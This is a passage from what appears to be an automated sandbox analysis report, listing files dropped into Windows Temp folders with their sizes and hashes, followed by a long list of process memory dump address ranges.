                                                5e75a5b5c80f3ec76b78e3993f694d6d2fc747a3f04363ff1de36e25669dfc68bbbdd8a0559ad3754ae956faab4cd53d73fb32044d7d82aee0b2ca012f969fe8

                                              • C:\Windows\Temp\{9FEA5D15-9CE4-42C6-BCA9-44BB9C090775}\.cr\z3SJkC5.exe

                                                Filesize

                                                7.7MB

                                                MD5

                                                eff9e9d84badf4b9d4c73155d743b756

                                                SHA1

                                                fd0ad0c927617a3f7b7e1df2f5726259034586af

                                                SHA256

                                                d61ef1bfa73bd5b013066d86f1c41e33bb396fc547cf5ab7191f56cc7b463aad

                                                SHA512

                                                0006273c86e8130e06e705a2be46c3433c0d1b34463123354c1857ebf88503d6e7e90602dc40960351baa03155074f8c5834b251be9da90fd95b10e498a98a19

                                              • C:\Windows\Temp\{C7CF07C6-0951-4353-AB0D-ACAA3F047FF3}\.ba\Quadrisyllable.dll

                                                Filesize

                                                168KB

                                                MD5

                                                a1e561bc201a14277dfc3bf20d1a6cd7

                                                SHA1

                                                1895fd97fb75ad6b59fc6d2222cf36b7dc608b29

                                                SHA256

                                                7ae39cb5cd14a875af3e43df4a309d6a7a44c0339c413bf21b0300c84e35b66c

                                                SHA512

                                                aaa4e7350094dc7574e5f18ce619f48a45062674353f0f2a340a1fea0055c7961a9b257455d8ea877d739635e3444df08f049484f48fa9729d8fb1667374cf3c

                                              • C:\Windows\Temp\{C7CF07C6-0951-4353-AB0D-ACAA3F047FF3}\.ba\WiseTurbo.exe

                                                Filesize

                                                8.7MB

                                                MD5

                                                1f166f5c76eb155d44dd1bf160f37a6a

                                                SHA1

                                                cd6f7aa931d3193023f2e23a1f2716516ca3708c

                                                SHA256

                                                2d13424b09ba004135a26ccd60b64cdd6917d80ce43070cbc114569eae608588

                                                SHA512

                                                38ad8f1308fe1aae3ddf7dbc3b1c5442663571137390b3e31e2527b8fec70e7266b06df295df0c411fcc500424022f274fd467d36040def2e1a4feff88c749b7

                                              • C:\Windows\Temp\{C7CF07C6-0951-4353-AB0D-ACAA3F047FF3}\.ba\phyllopod.html

                                                Filesize

                                                39KB

                                                MD5

                                                7acd5f1bb75aef6681027e02232f3b7d

                                                SHA1

                                                caef0696cf3a2c86078fe068cf37a2a58ea495c5

                                                SHA256

                                                7501366637ca181f4f0c310d4020ace9d58cbf872f47abf82dd42ed98d2d6bef

                                                SHA512

                                                0887ba61cefb6e5010d276a4c9596e126dd782f672928e32d2126935fba487ea2ff729c8ab840f7db8babc31c00db981957f5d90249da0972082ce9d7062f533

                                              • C:\Windows\Temp\{C7CF07C6-0951-4353-AB0D-ACAA3F047FF3}\.ba\sqlite3.dll

                                                Filesize

                                                891KB

                                                MD5

                                                1e24135c3930e1c81f3a0cd287fb0f26

                                                SHA1

                                                9d13bfe63ddb15743f7770387b21e15652f96267

                                                SHA256

                                                1ce645aa8d3e5ef2a57a0297121e54b31cc29b44b59a49b1330e3d0880ce5012

                                                SHA512

                                                04e3ffa4d71b2324fafcb856b9e686ffd3f7a24e1cb6531b3715aa3b0abd52709a9dcb79643384315ebc16cf8899bd9b218ca5c6d47dc97df278126d0836201f

                                              • memory/348-89-0x0000000000400000-0x0000000000465000-memory.dmp

                                                Filesize

                                                404KB

                                              • memory/348-91-0x0000000000400000-0x0000000000465000-memory.dmp

                                                Filesize

                                                404KB

                                              • memory/892-52-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-346-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-235-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-226-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-53-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-299-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-48-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-446-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-69-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-171-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-94-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/892-394-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/1032-17-0x0000000005D30000-0x0000000005D4E000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/1032-5-0x0000000005690000-0x00000000056F6000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/1032-2-0x0000000002750000-0x0000000002786000-memory.dmp

                                                Filesize

                                                216KB

                                              • memory/1032-3-0x0000000004FF0000-0x0000000005618000-memory.dmp

                                                Filesize

                                                6.2MB

                                              • memory/1032-4-0x0000000004E90000-0x0000000004EB2000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/1032-6-0x0000000005700000-0x0000000005766000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/1032-16-0x00000000058D0000-0x0000000005C24000-memory.dmp

                                                Filesize

                                                3.3MB

                                              • memory/1032-18-0x0000000005D70000-0x0000000005DBC000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/1032-24-0x00000000082B0000-0x0000000008854000-memory.dmp

                                                Filesize

                                                5.6MB

                                              • memory/1032-23-0x0000000007170000-0x0000000007192000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/1032-22-0x00000000071E0000-0x0000000007276000-memory.dmp

                                                Filesize

                                                600KB

                                              • memory/1032-19-0x0000000007680000-0x0000000007CFA000-memory.dmp

                                                Filesize

                                                6.5MB

                                              • memory/1032-20-0x0000000006270000-0x000000000628A000-memory.dmp

                                                Filesize

                                                104KB

                                              • memory/1040-531-0x0000000000BD0000-0x000000000107C000-memory.dmp

                                                Filesize

                                                4.7MB

                                              • memory/1040-987-0x0000000000BD0000-0x000000000107C000-memory.dmp

                                                Filesize

                                                4.7MB

                                              • memory/1656-367-0x00007FFF97CD0000-0x00007FFF97EC5000-memory.dmp

                                                Filesize

                                                2.0MB

                                              • memory/1656-417-0x0000000072FD0000-0x000000007314B000-memory.dmp

                                                Filesize

                                                1.5MB

                                              • memory/1704-361-0x0000000000360000-0x00000000003C0000-memory.dmp

                                                Filesize

                                                384KB

                                              • memory/1944-468-0x0000000000530000-0x00000000005A0000-memory.dmp

                                                Filesize

                                                448KB

                                              • memory/2076-298-0x0000000072EC0000-0x000000007303B000-memory.dmp

                                                Filesize

                                                1.5MB

                                              • memory/2076-300-0x00007FFF97CD0000-0x00007FFF97EC5000-memory.dmp

                                                Filesize

                                                2.0MB

                                              • memory/2076-318-0x0000000073490000-0x0000000073571000-memory.dmp

                                                Filesize

                                                900KB

                                              • memory/2076-313-0x0000000000400000-0x0000000000D48000-memory.dmp

                                                Filesize

                                                9.3MB

                                              • memory/2208-153-0x0000000000B00000-0x0000000000FA7000-memory.dmp

                                                Filesize

                                                4.7MB

                                              • memory/2208-108-0x0000000000B00000-0x0000000000FA7000-memory.dmp

                                                Filesize

                                                4.7MB

                                              • memory/2220-142-0x0000000000400000-0x000000000042F000-memory.dmp

                                                Filesize

                                                188KB

                                              • memory/2220-149-0x0000000010000000-0x000000001001C000-memory.dmp

                                                Filesize

                                                112KB

                                              • memory/2220-110-0x0000000000400000-0x000000000042F000-memory.dmp

                                                Filesize

                                                188KB

                                              • memory/2720-47-0x00000000008F0000-0x0000000000DC1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/2720-31-0x00000000008F0000-0x0000000000DC1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/2744-246-0x0000000000600000-0x000000000062F000-memory.dmp

                                                Filesize

                                                188KB

                                              • memory/2744-242-0x0000000000600000-0x000000000062F000-memory.dmp

                                                Filesize

                                                188KB

                                              • memory/2788-51-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/2788-50-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/2884-484-0x00000000006C0000-0x0000000000B5B000-memory.dmp

                                                Filesize

                                                4.6MB

                                              • memory/2884-450-0x00000000006C0000-0x0000000000B5B000-memory.dmp

                                                Filesize

                                                4.6MB

                                              • memory/2884-414-0x00000000006C0000-0x0000000000B5B000-memory.dmp

                                                Filesize

                                                4.6MB

                                              • memory/2980-1046-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/2980-1048-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/3420-424-0x00000000032C0000-0x00000000032C5000-memory.dmp

                                                Filesize

                                                20KB

                                              • memory/3420-423-0x00000000032C0000-0x00000000032C5000-memory.dmp

                                                Filesize

                                                20KB

                                              • memory/3572-93-0x0000000000950000-0x0000000001354000-memory.dmp

                                                Filesize

                                                10.0MB

                                              • memory/3572-92-0x0000000000950000-0x0000000001354000-memory.dmp

                                                Filesize

                                                10.0MB

                                              • memory/3572-145-0x0000000000950000-0x0000000001354000-memory.dmp

                                                Filesize

                                                10.0MB

                                              • memory/3572-67-0x0000000000950000-0x0000000001354000-memory.dmp

                                                Filesize

                                                10.0MB

                                              • memory/3616-87-0x0000000000460000-0x00000000004D8000-memory.dmp

                                                Filesize

                                                480KB

                                              • memory/3664-364-0x0000000000400000-0x0000000000429000-memory.dmp

                                                Filesize

                                                164KB

                                              • memory/3664-366-0x0000000000400000-0x0000000000429000-memory.dmp

                                                Filesize

                                                164KB

                                              • memory/3732-250-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/3732-253-0x00000000003F0000-0x00000000008C1000-memory.dmp

                                                Filesize

                                                4.8MB

                                              • memory/4172-472-0x0000000000400000-0x0000000000466000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/4172-470-0x0000000000400000-0x0000000000466000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/4172-487-0x0000000002BA0000-0x0000000002BA5000-memory.dmp

                                                Filesize

                                                20KB

                                              • memory/4404-197-0x0000000000CD0000-0x0000000000FCE000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/4404-227-0x0000000000CD0000-0x0000000000FCE000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/4404-169-0x0000000000CD0000-0x0000000000FCE000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/4844-343-0x0000000000400000-0x0000000000D48000-memory.dmp

                                                Filesize

                                                9.3MB

                                              • memory/4844-320-0x00007FFF97CD0000-0x00007FFF97EC5000-memory.dmp

                                                Filesize

                                                2.0MB

                                              • memory/4844-319-0x0000000072FD0000-0x000000007314B000-memory.dmp

                                                Filesize

                                                1.5MB

                                              • memory/4844-341-0x0000000072FD0000-0x000000007314B000-memory.dmp

                                                Filesize

                                                1.5MB

                                              • memory/4896-386-0x0000014037080000-0x00000140370D2000-memory.dmp

                                                Filesize

                                                328KB

                                              • memory/4896-387-0x0000014038500000-0x000001403860A000-memory.dmp

                                                Filesize

                                                1.0MB

                                              • memory/4896-389-0x0000014038370000-0x00000140383AC000-memory.dmp

                                                Filesize

                                                240KB

                                              • memory/4896-388-0x0000014037130000-0x0000014037142000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/4896-391-0x00007FF6EAAF0000-0x00007FF6EAC9E000-memory.dmp

                                                Filesize

                                                1.7MB

                                              • memory/4948-445-0x000002971FBC0000-0x000002971FBEA000-memory.dmp

                                                Filesize

                                                168KB

                                              • memory/4988-224-0x0000000000B60000-0x00000000017A9000-memory.dmp

                                                Filesize

                                                12.3MB

                                              • memory/4988-232-0x0000000000B60000-0x00000000017A9000-memory.dmp

                                                Filesize

                                                12.3MB

                                              • memory/4988-248-0x0000000000B60000-0x00000000017A9000-memory.dmp

                                                Filesize

                                                12.3MB

                                              • memory/4988-231-0x0000000000B60000-0x00000000017A9000-memory.dmp

                                                Filesize

                                                12.3MB

                                              • memory/5436-1115-0x00000000009C0000-0x000000000104E000-memory.dmp

                                                Filesize

                                                6.6MB

                                              • memory/5436-1122-0x00000000009C0000-0x000000000104E000-memory.dmp

                                                Filesize

                                                6.6MB

                                              • memory/5484-1087-0x0000000000140000-0x000000000082E000-memory.dmp

                                                Filesize

                                                6.9MB

                                              • memory/5484-1036-0x0000000000140000-0x000000000082E000-memory.dmp

                                                Filesize

                                                6.9MB

                                              • memory/5784-1088-0x00000000009D0000-0x0000000000CE2000-memory.dmp

                                                Filesize

                                                3.1MB

                                              • memory/5784-1114-0x00000000009D0000-0x0000000000CE2000-memory.dmp

                                                Filesize

                                                3.1MB